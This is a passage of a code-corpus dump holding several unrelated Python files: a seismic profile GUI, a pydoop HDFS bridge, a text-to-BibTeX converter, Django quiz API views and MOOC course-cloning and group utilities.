self.fig.add_subplot(1, 2, 2)\n self.mcanvas.set_ylabel(\"Depth (m)\")\n self.mcanvas.set_xlabel(\"Velocity (m/s2)\")\n self.mcanvas.set_xlim(vmin, vmax)\n self.mcanvas.set_ylim(sum(thickness), 0)\n self.mcanvas.grid()\n self.fig.subplots_adjust(top=0.95, left=0.1, right=0.95, bottom=0.15,\n hspace=0.1)\n # Make the sliders\n sliderax = self.fig.add_axes([0.20, 0.03, 0.60, 0.03])\n self.errslider = widgets.Slider(sliderax, 'Error',\n 0, 10, valinit=0.,\n valfmt='%2.1f (percent)')\n # Initialize the data\n self.error = 0.\n self.velocity = vmin * numpy.ones_like(thickness)\n self.predtts = profile.layered_straight_ray(thickness, self.velocity,\n zp)\n self.layers = [sum(thickness[:i]) for i in xrange(len(thickness) + 1)]\n self.predplot, = self.dcanvas.plot(self.predtts, zp, '-r', linewidth=2)\n if self.tts is not None:\n self.ttsplot, = self.dcanvas.plot(self.tts, self.zp, 'ok')\n self.ploty = [self.layers[0]]\n for y in self.layers[1:-1]:\n self.ploty.append(y)\n self.ploty.append(y)\n self.ploty.append(self.layers[-1])\n self.plotx = numpy.zeros_like(self.ploty)\n self.layerplot, = self.mcanvas.plot(self.plotx, self.ploty, 'o-k',\n linewidth=2)\n self.guide, = self.mcanvas.plot([], [], marker='o', linestyle='--',\n color='red', linewidth=2)\n\n def run(self):\n self.connect()\n pyplot.show()\n\n def get_data(self):\n return self.predtts\n\n def savedata(self, fname):\n data = numpy.array([self.zp, self.predtts]).T\n numpy.savetxt(fname, data, fmt='%.5f')\n\n def connect(self):\n self.errslider.on_changed(self.set_error)\n self.fig.canvas.mpl_connect('button_press_event', self.pick)\n self.fig.canvas.mpl_connect('key_press_event', self.key_press)\n self.fig.canvas.mpl_connect('motion_notify_event', self.move)\n\n def set_error(self, value):\n self.error = 0.01 * value\n self.update()\n self.draw()\n\n def update(self):\n self.predtts = utils.contaminate(\n profile.layered_straight_ray(self.thickness, self.velocity,\n self.zp),\n self.error, percent=True)\n self.predplot.set_data(self.predtts, self.zp)\n if self.tts is not None:\n xmin = min(self.predtts.min(), self.tts.min())\n xmax = max(self.predtts.max(), self.tts.max())\n else:\n xmin = self.predtts.min()\n xmax = self.predtts.max()\n if xmin != xmax:\n self.dcanvas.set_xlim(xmin, xmax)\n\n def draw_guide(self, x, z):\n i = bisect.bisect(self.layers, z)\n if i > 0:\n z1 = self.layers[i - 1]\n z2 = self.layers[i]\n x1 = self.velocity[i - 1]\n self.guide.set_data([x1, x, x, x1], [z1, z1, z2, z2])\n\n def move(self, event):\n if event.inaxes != self.mcanvas:\n return 0\n self.draw_guide(event.xdata, event.ydata)\n self.draw()\n\n def pick(self, event):\n if event.inaxes != self.mcanvas:\n return 0\n x, z = event.xdata, event.ydata\n if (event.button == 1):\n i = bisect.bisect(self.layers, z) - 1\n self.velocity[i] = x\n self.plotx[2 * i] = x\n self.plotx[2 * i + 1] = x\n self.layerplot.set_data(self.plotx, self.ploty)\n self.guide.set_data([], [])\n self.update()\n self.draw()\n\n def key_press(self, event):\n pass\n","sub_path":"fatiando/gui/simple.py","file_name":"simple.py","file_ext":"py","file_size_in_byte":21646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"407362620","text":"# BEGIN_COPYRIGHT\n#\n# Copyright 2009-2016 CRS4.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may not\n# use this file except in compliance with the License. You may obtain a copy\n# of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n#\n# END_COPYRIGHT\n\n\"\"\"\nJPype-bridged HDFS core implementation.\n\"\"\"\nimport os\n\nimport pydoop\nfrom pydoop.utils.bridge.factory import JavaWrapperFactory\n\n\ndef get_implementation_module():\n from . import hadoop\n return hadoop\n\n\ndef init(bridge_type):\n hadoop_classpath = pydoop.hadoop_classpath()\n if hadoop_classpath is None:\n raise RuntimeError('Hadoop classpath not set')\n classpath = os.environ.get('classpath', '.') + ':' + hadoop_classpath\n return JavaWrapperFactory(\n classpath=classpath, java_bridge_name=bridge_type\n )\n\n\nBRIDGE_TYPE = 'JPype'\ntry:\n _WRAPPER_FACTORY\nexcept NameError:\n _WRAPPER_FACTORY = init(BRIDGE_TYPE)\n\n\ndef get_wrapper_factory():\n return _WRAPPER_FACTORY\n","sub_path":"pydoop/hdfs/core/bridged/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"170398519","text":"class Article:\n def __init__(self, label, authorlist, title, journal, volume, number, year, pages, doi):\n self.label = label\n self.authorlist = authorlist\n self.title = title\n self.journal = journal\n self.volume = volume\n self.number = number\n self.year = year\n self.pages = pages\n self.doi = doi\n\n @classmethod\n def fromline(cls,line):\n stringlist = line.split('\"')\n authors = stringlist[0].split(',')[:-1]\n authorlist = []\n for author in authors:\n names = author.split(\" \")\n lastname = names[-1]\n firstnames = \" \".join([name for name in names[:-1] if name != 'and'])\n authorlist.append((lastname,firstnames))\n title = stringlist[1]\n journal = stringlist[2].split(\",\")[0]\n rest = stringlist[2].split(\",\")[1].split()\n volume = rest[0]\n number = '\"\"'\n year = \"\".join([c for c in rest[2] if c in \"0123456789\"])\n pages = rest[1]\n doi = \"\"\n label = authorlist[0][0]+year\n return Article(label, authorlist, title, journal, volume, number, year, pages, doi)\n\n def write(self):\n print(\"@article{%s,\" % self.label)\n print(' author = \"', end=\"\")\n for author in self.authorlist[:-1]:\n print(\"%s, %s and \" % (author[0],author[1]), end=\"\")\n lastauthor = self.authorlist[-1]\n print('%s, %s\",' % (lastauthor[0],lastauthor[1]))\n print(' title = \"%s\",' % self.title)\n print(' journal = \"%s\",' % self.journal)\n print(' volume = %s,' % self.volume)\n print(' number = %s,' % self.number)\n print(' year = %s,' % self.year)\n print(' pages = \"%s\",' % self.pages)\n print(' doi = \"%s\",' % self.doi)\n print(\"}\\n\")\n\n# @article{alleman2017,\n# author = \"Alleman, Coleman and Foulk, III., James W. and Mota, Alejandro and Lim, Hojun and Littlewood, David J.\",\n# title = \"Concurrent multiscale modeling of microstructural effects on localization behavior in finite deformation solid mechanics\",\n# journal = \"Computational Mechanics\",\n# volume = 61,\n# number = {1-2},\n# year = 2018,\n# pages = \"207--218\",\n# doi = \"10.1007/s00466-017-1481-5\",\n# }\n\n# label = \"alleman2017\"\n# authorlist = [\n# (\"Alleman\", \"Coleman\"), \n# (\"Foulk\", \"III., James W.\"), \n# (\"Mota\", \"Alejandro\"),\n# (\"Lim\", \"Hojun\"),\n# (\"Littlewood\", \"David J.\")\n# ]\n# title = \\\n# \"Concurrent multiscale modeling of microstructural effects on localization behavior in finite deformation solid mechanics\"\n# journal = \"Computational Mechanics\"\n# volume = \"61\"\n# number = \"{1-2}\"\n# year = \"2018\"\n# pages = \"207--218\"\n# doi = \"10.1007/s00466-017-1481-5\"\n\n# a = Article(label, authorlist, title, journal, volume, number, year, pages,doi)\n# a.write()\n\n# line = 'Y. Zuo, C. Chen, X. Li, Z. Deng, Y. Chen, J. Behler, G. Csnyi, A. V. Shapeev, A. P. Thompson, M. A. Wood, and S. P. Ong, \"A performance and cost assessment of machine learning interatomic potentials,\" J. Phys. Chem. A, 124 731 (2020).'\n\n# a = Article.fromline(line)\n# a.write()\n\nfilename = \"vita_2020.txt\"\nfile = open(filename,'r',encoding=\"utf-16\")\n\nstartflag = False\nwhile 1:\n line = file.readline()\n if \"PUBLICATIONS\" in line:\n startflag = True\n elif \"INVITED TALKS\" in line:\n break\n elif startflag:\n# print(line)\n if len(line) > 1:\n a = Article.fromline(line)\n a.write()\n\n","sub_path":"txt2bibtex.py","file_name":"txt2bibtex.py","file_ext":"py","file_size_in_byte":3487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"509790409","text":"from account.models import MyUser, TakeQuiz\nfrom django.shortcuts import render\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import serializers, status\nfrom rest_framework.authentication import TokenAuthentication\nfrom rest_framework.permissions import AND, IsAuthenticated\nfrom nanoid import generate\nfrom quizzes.models import Quizzes\nfrom quizzes.serializers import QuizzesSerializer, TakeQuizSerializer, UserProfileSerializer\nfrom topic.models import Topic\nfrom question.models import Question\nfrom question.serializers import QuestionSerializer, QuestionAnswerSerializer\nfrom datetime import datetime\nfrom answer.models import TakeAnswer\nfrom answer.serializers import TakeAnswerSerializer\nfrom rest_framework.renderers import JSONRenderer\n# from evaluate.similarity import Similarity\nimport random\n\n# Create your views here.\nclass QuizzesView(APIView):\n\n # authentication_classes = [TokenAuthentication]\n # permission_classes = [IsAuthenticated]\n def get(self, requests, code, user_id, format=None):\n data = Quizzes.objects.filter(topic=code)\n serializer = QuizzesSerializer(data, many=True)\n return Response(serializer.data)\n\n def post(self, requests, code, user_id, format=None):\n \"\"\"\n data = {\n \"title\":\"quiz q\",\n \"description\":\"desc\"\n }\n \"\"\"\n print(code)\n data = requests.data\n print(data)\n print(user_id)\n # topic = Topic.objects.get(code=data['topic'])\n # data['topic'] = topic\n # print(data['topic'])\n data['topic'] = code\n data['id'] = generate(size=15)\n print(data)\n serializer = QuizzesSerializer(data=data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\nclass TakeQuizView(APIView):\n \n def get(self, request, quiz_id, user_id, format=None):\n # try:\n user = MyUser.objects.get(id=user_id)\n print(user)\n quiz = Quizzes.objects.get(id=quiz_id)\n print(quiz)\n try: \n q = TakeQuiz.objects.get(user__id=user_id, quiz__id=quiz_id)\n id = q.id\n except: \n id = generate(size=20)\n print(id)\n similarity = None\n score = None\n user.quiz_taken.add(quiz, through_defaults={\n 'id': id, 'similarity': similarity, 'score':score\n })\n print(\"sebelum\")\n question = Question.objects.filter(quiz=quiz_id)\n print(question)\n data = QuestionSerializer(question, many=True).data\n data = {\"take_id\":id, \"question\": data}\n return Response(data, status=status.HTTP_201_CREATED)\n # except:\n # error = {\"message\": \"please check quiz_id or user_id\"}\n # return Response(error, status=status.HTTP_400_BAD_REQUEST)\n \n def put(self, request, quiz_id, user_id, format=None):\n take_id = request.data['take_id']\n takequiz = TakeQuiz.objects.get(id=take_id)\n a = TakeQuizSerializer(takequiz, data={'finished_at':datetime.now()}, partial=True)\n if a.is_valid():\n a.save()\n return Response(a.data, status=status.HTTP_201_CREATED)\n\nclass QuizTakenView(APIView):\n def get(self, request, quiz_id, user_id, format=None):\n user = MyUser.objects.filter(id=user_id)\n return Response(UserProfileSerializer(user, many=True).data)\n\nclass SubmitView(APIView):\n\n def post(self, request, quiz_id, user_id, format=None):\n \"\"\"\n data = { \"data\" : [\n {\n \"question\": \"question id \",\n \"student_answer\": \"answer\"\n },\n {\n \"question\": \"question id \",\n \"student_answer\": \"answer\"\n },\n ]\n }\n \"\"\"\n # similarity = Similarity()\n\n data = request.data\n data = data['data']\n\n try: \n take_id = TakeQuiz.objects.get(user__id=user_id, quiz__id=quiz_id)\n for row in data:\n x = row['student_answer'].lower()\n y = Question.objects.get(id=row['question']).answer.lower()\n print((x, y))\n # row['similarity'] = similarity.calculate(x, y)[0][0]\n row['take_id'] = take_id.id\n\n serializer = TakeAnswerSerializer(data=row)\n if serializer.is_valid():\n serializer.save()\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n message = {\"message\": \"You have successfully submitted\"}\n return Response(message, status=status.HTTP_201_CREATED)\n except: \n error = {\"message\": \"please check quiz_id or user_id\"}\n return Response(error, status=status.HTTP_400_BAD_REQUEST)\n\nclass AllReportView(APIView):\n\n def get(self, request, quiz_id, format=None):\n quiz = TakeQuiz.objects.filter(quiz__id=quiz_id)\n return Response(TakeQuizSerializer(quiz, many=True).data)\n\nclass DetailReportView(APIView):\n # renderer_classes = [JSONRenderer]\n def get(self, request, quiz_id, user_id, format=None):\n question_answer = Question.objects.filter(quiz__id=quiz_id)\n question_answer_data = QuestionAnswerSerializer(question_answer, many=True).data\n\n take_quiz = TakeQuiz.objects.get(user__id=user_id, quiz__id=quiz_id)\n\n take_answer = TakeAnswer.objects.filter(take_id__id=take_quiz.id)\n take_answer_data = TakeAnswerSerializer(take_answer, many=True).data\n List = []\n for a,b in zip(question_answer_data,take_answer_data):\n List.append({**a, **b})\n data = {\n \"name\": MyUser.objects.get(id=user_id).first_name,\n \"score\": take_quiz.score,\n \"data\": List\n }\n # print(type(data), type(serializer))\n return Response(data)\n\nclass CalculateView(APIView):\n\n def get(self, request, quiz_id, format=None):\n # #sim = Similarity()\n # threshold = 0.7\n # take_id_object = TakeQuiz.objects.filter(quiz=quiz_id)\n # for i in take_id_object.iterator():\n # take_answer_object = TakeAnswer.objects.filter(take_id=i.id)\n\n # score = 0\n # sum_similarity = 0\n # for j in take_answer_object.iterator():\n # question_id = j.question_id\n # answer = Question.objects.get(id=question_id).answer.lower()\n # student_answer = j.student_answer.lower()\n\n # #similarity = sim.calculate(student_answer, answer)[0][0]\n # similarity = random.uniform(0,1)\n # sum_similarity += similarity\n # true_or_false = False\n # if similarity >= threshold:\n # true_or_false = True\n # score += 1\n # a = TakeAnswerSerializer(j, data={'similarity':similarity, 'true_or_false':true_or_false}, partial=True)\n # if a.is_valid():\n # a.save()\n # #print(score, take_answer_object.count())\n # score = score / take_answer_object.count() * 100\n # sum_similarity = sum_similarity / take_answer_object.count()\n # take_quiz = TakeQuiz.objects.get(id=i.id)\n # take_quiz_serializer = TakeQuizSerializer(take_quiz, data={'score':score, 'similarity':sum_similarity}, partial=True)\n # if take_quiz_serializer.is_valid():\n # take_quiz_serializer.save()\n\n data = {\"message\":\"Yeay!!! the scores have been calculated\"}\n return Response(data, status=status.HTTP_200_OK)","sub_path":"quizzes/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"3283521","text":"# -*- coding: utf-8 -*-\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport logging\nimport json\nimport os\nimport requests\nimport time\nimport hashlib\nimport sys\nimport re\n\nfrom datetime import date, datetime\nfrom deep_serializer import serializer, deserializer\n\n\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.contrib.sites.models import Site\nfrom django.core.mail import get_connection, send_mass_mail, EmailMultiAlternatives, EmailMessage\nfrom django.template import loader\nfrom django.template.loader import render_to_string\nfrom django.utils.translation import ugettext as _\n\nfrom moocng import mongodb\nfrom moocng.api.tasks import update_kq_mark, update_unit_mark, update_course_mark\nfrom moocng.badges.models import Badge\nfrom moocng.courses.models import Course, Unit, KnowledgeQuantum, Question, Option, Attachment, CourseStudent\nfrom moocng.courses.serializer import (CourseClone, UnitClone, KnowledgeQuantumClone,\n BaseMetaWalkClass, QuestionClone, PeerReviewAssignmentClone,\n EvaluationCriterionClone, OptionClone, AttachmentClone)\nfrom moocng.peerreview.models import PeerReviewAssignment, EvaluationCriterion\nfrom moocng.courses.marks import get_course_mark\n\nfrom moocng.courses.security import get_units_available_for_user\n\nfrom moocng.media_contents import get_media_type\nfrom bson.objectid import ObjectId\n\nlogger = logging.getLogger(__name__)\n\nTRACE_CLONE_COURSE_DIR = 'trace_clone_course'\nimport pymongo\n\nimport csv\ntry:\n import StringIO\nexcept Exception:\n from io import StringIO\nfrom HTMLParser import HTMLParser\n\n\ndef is_teacher(user, courses):\n\n \"\"\"\n Return if a user is teacher of a course or not\n\n :returns: Boolean\n\n .. versionadded:: 0.1\n \"\"\"\n is_teacher = False\n if isinstance(courses, Course):\n courses = [courses]\n if user.is_authenticated():\n for course in courses:\n is_teacher = is_teacher or course.teachers.filter(id=user.id).exists()\n return is_teacher\n\n\nUNIT_BADGE_CLASSES = {\n 'n': 'badge-inverse',\n 'h': 'badge-warning',\n 'e': 'badge-important',\n}\n\n\ndef get_unit_badge_class(unit):\n\n \"\"\"\n .. versionadded:: 0.1\n \"\"\"\n return UNIT_BADGE_CLASSES[unit.unittype]\n\n\ndef is_course_ready(course):\n\n \"\"\"\n Return if the current course is ready for users. This is done by comparing\n the start and end dates of the course.\n\n :returns: Boolean pair\n\n .. versionadded:: 0.1\n \"\"\"\n has_content = course.unit_set.count() > 0\n is_ready = True\n is_outdated = False\n ask_admin = False\n if course.start_date:\n is_ready = date.today() >= course.start_date\n if is_ready and not has_content:\n is_ready = False\n ask_admin = True\n is_outdated = date.today() > course.end_date\n else:\n if not has_content:\n is_ready = False\n ask_admin = True\n return (is_ready, ask_admin, is_outdated)\n\n\ndef send_mail_wrapper(subject, template, context, to):\n\n \"\"\"\n Simple wrapper on top of the django send_mail function.\n\n .. versionadded:: 0.1\n \"\"\"\n try:\n body = loader.render_to_string(template, context)\n email = EmailMessage(\n subject=subject,\n body=body,\n from_email=settings.DEFAULT_FROM_EMAIL,\n to=to\n )\n email.send()\n except IOError as ex:\n logger.error('The notification \"%s\" to %s could not be sent because of %s' % (subject, str(to), str(ex)))\n\n\ndef send_mass_mail_wrapper(subject, message, recipients, html_message=None):\n\n \"\"\"\n Simple wrapper on top of the django send_mass_mail function.\n\n .. versionadded: 0.1\n \"\"\"\n try:\n mails = []\n content = message\n for to in recipients:\n email = EmailMultiAlternatives(subject, content, settings.DEFAULT_FROM_EMAIL, [to])\n if html_message:\n email.attach_alternative(html_message, \"text/html\")\n mails.append(email)\n\n get_connection().send_messages(mails)\n except IOError as ex:\n logger.error('The massive email \"%s\" to %s could not be sent because of %s' % (subject, recipients, str(ex)))\n\n\ndef send_cloned_activity_email(original_course, copy_course, user):\n context = {'user': user,\n 'original_course': original_course,\n 'copy_course': copy_course,\n 'site': Site.objects.get_current()}\n message = render_to_string('courses/clone_course_activity.txt', context)\n html_message = render_to_string('courses/clone_course_activity.html', context)\n subject = _(settings.SUBJECT_CLONE_ACTIVITY)\n send_mass_mail_wrapper(subject, message, [user.email], html_message)\n\n\ndef get_trace_clone_file_name(original_course, copy_course):\n return '%s_original_pk_%s_copy_pk_%s.json' % (original_course.slug,\n original_course.pk,\n copy_course.pk)\n\n\ndef get_trace_clone_dir_path():\n return os.path.join(settings.MEDIA_ROOT, TRACE_CLONE_COURSE_DIR)\n\n\ndef get_trace_clone_file_path(file_name):\n return os.path.join(get_trace_clone_dir_path(), file_name)\n\n\ndef clone_course(course, request):\n \"\"\"\n Returns a clone of the course param and its relations\n \"\"\"\n walking_classes = {Course: CourseClone,\n User: BaseMetaWalkClass,\n Badge: BaseMetaWalkClass,\n Unit: UnitClone,\n KnowledgeQuantum: KnowledgeQuantumClone,\n Attachment: AttachmentClone,\n Question: QuestionClone,\n Option: OptionClone,\n PeerReviewAssignment: PeerReviewAssignmentClone,\n EvaluationCriterion: EvaluationCriterionClone}\n fixtures_format = 'json'\n fixtures_json = serializer(fixtures_format,\n initial_obj=course,\n walking_classes=walking_classes,\n natural_keys=True,\n request=request)\n objs = deserializer(fixtures_format,\n fixtures_json,\n initial_obj=course,\n walking_classes=walking_classes)\n course.slug = course.slug_original\n dir_path = get_trace_clone_dir_path()\n if not os.path.exists(dir_path):\n os.makedirs(dir_path)\n file_name = get_trace_clone_file_name(course, objs[0])\n file_path = get_trace_clone_file_path(file_name)\n f = open(file_path, 'w')\n f.write(json.dumps(course.trace_ids, indent=4))\n if request:\n return objs, file_name\n return objs, file_path\n\n\ndef _clone_activity_user_course(mongo_db, trace_ids, user, copy_course, original_course):\n activity = mongo_db.get_collection('activity')\n original_act_docs = activity.find({\"user_id\": user.pk,\n \"course_id\": original_course.pk})\n new_act_docs = []\n for ori_act_doc in original_act_docs:\n try:\n ori_kq_id = str(int(ori_act_doc['kq_id']))\n ori_unit_id = str(int(ori_act_doc['unit_id']))\n except (ValueError, TypeError):\n continue\n new_act_doc = {}\n new_act_doc['user_id'] = user.pk\n new_act_doc['course_id'] = copy_course.pk\n try:\n new_act_doc['kq_id'] = trace_ids['KnowledgeQuantum'][ori_kq_id]\n new_act_doc['unit_id'] = trace_ids['Unit'][ori_unit_id]\n except KeyError:\n continue\n exists_doc = activity.find(new_act_doc).count() > 0\n if not exists_doc:\n new_act_docs.append(new_act_doc)\n if new_act_docs:\n activity.insert(new_act_docs)\n return new_act_docs\n\n\ndef _clone_answer_user_course(mongo_db, trace_ids, user, copy_course, original_course):\n answers = mongo_db.get_collection('answers')\n original_answer_docs = answers.find({\"user_id\": user.pk,\n \"course_id\": original_course.pk})\n insert_answer_docs = []\n update_answer_docs = {}\n for answer_doc in original_answer_docs:\n try:\n ori_kq_id = str(int(answer_doc['kq_id']))\n ori_question_id = str(int(answer_doc['question_id']))\n ori_unit_id = str(int(answer_doc['unit_id']))\n except (ValueError, TypeError):\n continue\n new_answer_doc = {}\n try:\n new_answer_doc['user_id'] = user.pk\n new_answer_doc['course_id'] = copy_course.pk\n new_answer_doc['kq_id'] = trace_ids['KnowledgeQuantum'][ori_kq_id]\n new_answer_doc['question_id'] = trace_ids['Question'][ori_question_id]\n new_answer_doc['unit_id'] = trace_ids['Unit'][ori_unit_id]\n except KeyError:\n continue\n exists_doc_without_reply = answers.find_one(new_answer_doc)\n replyList = answer_doc['replyList']\n if not isinstance(replyList, list):\n continue\n for reply in replyList:\n try:\n reply['option'] = trace_ids['Option'][str(int(reply['option']))]\n except KeyError:\n continue\n new_answer_doc['replyList'] = answer_doc['replyList']\n exists_doc = answers.find_one(new_answer_doc)\n if not exists_doc_without_reply:\n new_answer_doc['date'] = answer_doc['date']\n insert_answer_docs.append(new_answer_doc)\n elif exists_doc_without_reply and not exists_doc:\n update_answer_docs[exists_doc_without_reply['_id']] = new_answer_doc\n if insert_answer_docs:\n answers.insert(insert_answer_docs)\n if update_answer_docs:\n for _id, update_answer_doc in update_answer_docs.items():\n answers.update({'_id': _id},\n {'$set': {'replyList': update_answer_doc['replyList']}},\n upsert=True)\n return (insert_answer_docs, update_answer_docs)\n\n\ndef clone_activity_user_course(user, copy_course, original_course=None, force_email=False):\n if not original_course:\n original_course = copy_course.created_from\n if not original_course:\n raise ValueError(\"This course needs a original course\")\n try:\n course_student_relation = user.coursestudent_set.get(course=copy_course)\n except CourseStudent.DoesNotExist:\n return ([], [], [])\n\n file_name = get_trace_clone_file_name(original_course, copy_course)\n file_path = get_trace_clone_file_path(file_name)\n f = open(file_path)\n trace_ids = json.loads(f.read())\n f.close()\n if not copy_course.pk == trace_ids['Course'][str(original_course.pk)]:\n raise ValueError\n\n mongo_db = mongodb.get_db()\n\n new_act_docs = _clone_activity_user_course(mongo_db, trace_ids, user,\n copy_course, original_course)\n\n insert_answer_docs, update_answer_docs = _clone_answer_user_course(\n mongo_db, trace_ids, user,\n copy_course, original_course)\n\n if (new_act_docs or insert_answer_docs or update_answer_docs or\n course_student_relation.old_course_status != 'c' or force_email):\n if course_student_relation.old_course_status != 'c':\n course_student_relation.old_course_status = 'c'\n course_student_relation.save()\n if not settings.DEBUG:\n send_cloned_activity_email(original_course, copy_course, user)\n update_course_mark_by_user(copy_course, user)\n return (new_act_docs, insert_answer_docs, update_answer_docs)\n\n\ndef update_passed(db, collection, passed_now, data):\n if not passed_now:\n return\n stats_collection = db.get_collection(collection)\n stats_collection.update(\n data,\n {'$inc': {'passed': 1}},\n safe=True\n )\n\n\ndef update_course_mark_by_user(course, user):\n db = mongodb.get_db()\n for unit in course.unit_set.all():\n for kq in unit.knowledgequantum_set.all():\n updated_kq, passed_kq_now = update_kq_mark(db, kq, user, course.threshold)\n update_passed(db, 'stats_kq', passed_kq_now, {'kq_id': kq.pk})\n updated_unit, passed_unit_now = update_unit_mark(db, unit, user, course.threshold)\n update_passed(db, 'stats_unit', passed_unit_now, {'unit_id': unit.pk})\n updated_course, passed_course_now = update_course_mark(db, course, user)\n update_passed(db, 'stats_course', passed_course_now, {'course_id': course.pk})\n\ndef get_sillabus_tree(course,user,minversion=True,incontext=False):\n units = []\n\n current_mark_kq = course.get_user_mark(user)\n\n course_units = get_units_available_for_user(course, user, True)\n\n if len(course_units) > 0:\n if not incontext:\n\n for u in course_units:\n unit, current_mark_kq = get_unit_tree(u, user, current_mark_kq, minversion)\n units.append(unit)\n\n else:\n if current_mark_kq is not None:\n unit, current_mark_kq = get_unit_tree(current_mark_kq.unit, user, current_mark_kq, minversion)\n units.append(unit)\n else:\n prev = None\n for u in course_units:\n unit, current_mark_kq = get_unit_tree(u, user, current_mark_kq, minversion)\n\n if not unit['complete']:\n units.append(unit)\n return units\n else:\n prev = unit\n units.append(prev)\n\n return units\n\ndef get_unit_tree(unit, user, current_mark_kq, minversion=True):\n questions = []\n unitcomplete = True\n current_marked = False\n\n for q in KnowledgeQuantum.objects.filter(unit_id=unit.id):\n\n completed = q.is_completed(user)\n\n # If one question is not completed unit is not completed\n if unitcomplete and not completed:\n unitcomplete = False\n\n current = False\n if not current_marked and current_mark_kq is not None:\n current = q == current_mark_kq\n elif not current_marked:\n current = not completed\n\n if current == True:\n current_marked = True\n current_mark_kq = q\n\n qa = {\n \"completed\" : completed,\n \"pk\" : q.pk,\n \"title\": q.title,\n \"url\": \"/course/\"+unit.course.slug+\"/classroom/#!unit\"+str(unit.pk)+\"/kq\"+str(q.pk),\n \"current\" : current\n }\n\n if not minversion:\n qa[\"has_video\"] = get_media_type(q.media_content_type) == \"video\"\n qa[\"has_presentation\"] = get_media_type(q.media_content_type) == \"presentation\"\n qa[\"has_book\"] = get_media_type(q.media_content_type) == \"book\"\n qa[\"has_attachments\"] = len(q.attachment_set.filter()) > 0\n qa[\"has_test\"] = len(q.question_set.filter()) > 0\n qa[\"has_pr\"] = q.kq_type() == \"PeerReviewAssignment\"\n\n questions.append(qa)\n\n unit = {\n 'id': unit.id,\n 'title': unit.title,\n 'status': unit.status,\n 'url': \"/course/\"+unit.course.slug+\"/classroom/#!unit\"+str(unit.pk),\n 'unittype': unit.unittype,\n 'badge_class': get_unit_badge_class(unit),\n 'badge_tooltip': unit.get_unit_type_name(),\n 'complete' : unitcomplete,\n 'questions' : questions\n }\n\n return unit, current_mark_kq\n\ndef create_groups(id_course):\n id_course = int(id_course)\n\n mongodb.get_db().get_collection('groups').remove({\"id_course\": {\"$eq\": id_course}})\n if(mongodb.get_db().get_collection('groups').find({\"id_course\":id_course}).count() == 0):\n\n course = Course.objects.filter(id=id_course)[:1].get()\n size_group = course.group_max_size\n students = course.students.all()\n\n num_groups = len(students) / size_group\n groupNames = {\n 'es': 'Grupo',\n 'en': 'Group',\n 'fr': 'Groupe',\n 'pt': 'Grupo',\n 'de': 'Gruppe',\n 'it': 'Gruppo'\n }\n groups = {}\n for lang in settings.LANGUAGES:\n groups[lang[0]] = []\n\n for student in students:\n lang = student.get_profile().language\n country = student.get_profile().country\n if not lang:\n lang = ''\n if not country:\n country = ''\n\n student = {\"id_user\": student.id, \"username\": student.username,\n \"first_name\":student.first_name, \"last_name\":student.last_name,\n \"email\": student.email, \"karma\": student.get_profile().karma, \"country\": country,\n \"language\": lang}\n\n if not lang or lang not in groupNames:\n if course.languages.count() > 0:\n lang = course.languages.all()[0].abbr.encode()\n else:\n lang = settings.DEFAULT_LANGUAGE\n\n group = None\n if len(groups[lang]) > 0:\n group = groups[lang][-1]\n\n if not group or len(group[\"members\"]) >= course.group_max_size:\n group = {\"id_course\": id_course, \"name\": groupNames[lang] + str(len(groups[lang])+1), \"hashtag\": course.hashtag+groupNames[lang] + str(len(groups[lang])+1), \"lang\": lang, \"size\": 1, \"members\": []}\n group[\"members\"].append(student)\n groups[lang].append(group)\n else:\n group[\"members\"].append(student)\n if \"size\" in group:\n group[\"size\"] += 1\n else:\n group[\"size\"] = len(group[\"members\"])\n groups[lang][-1] = group\n\n for lang in settings.LANGUAGES:\n for group in groups[lang[0]]:\n mongodb.get_db().get_collection('groups').insert(group)\n\ndef get_group_by_user_and_course(id_user, id_course):\n\n db = mongodb.get_db().get_collection('groups')\n group = db.find_one( { 'id_course': id_course, 'members.id_user':id_user } )\n return group\n\ndef get_groups_by_course(id_course, my_group=None):\n if my_group is not None:\n return mongodb.get_db().get_collection('groups').find({\"$and\":[{'id_course':int(id_course)},{\"_id\": {'$ne': ObjectId(my_group)}}]}).sort(\"_id\",pymongo.ASCENDING)\n else:\n return mongodb.get_db().get_collection('groups').find({'id_course':int(id_course)}).sort(\"_id\",pymongo.ASCENDING)\n\ndef change_user_group(id_user, id_group, new_id_group, pos_lat=0.0, pos_lon=0.0):\n groupCollection = mongodb.get_db().get_collection('groups')\n group = groupCollection.find_one({'_id': ObjectId(id_group)})\n\n for m in group[\"members\"]:\n if m[\"id_user\"] == id_user:\n member = m\n group[\"members\"].remove(m)\n if \"size\" in group:\n group[\"size\"] -= 1\n else:\n group[\"size\"] = len(group[\"members\"])\n\n groupCollection.update({'_id': ObjectId(id_group)}, {\"$set\": {\"members\": group[\"members\"], \"size\": group[\"size\"]}})\n group = groupCollection.find_one({'_id': ObjectId(new_id_group)})\n group[\"members\"].append(member)\n if \"size\" in group:\n group[\"size\"] += 1\n else:\n 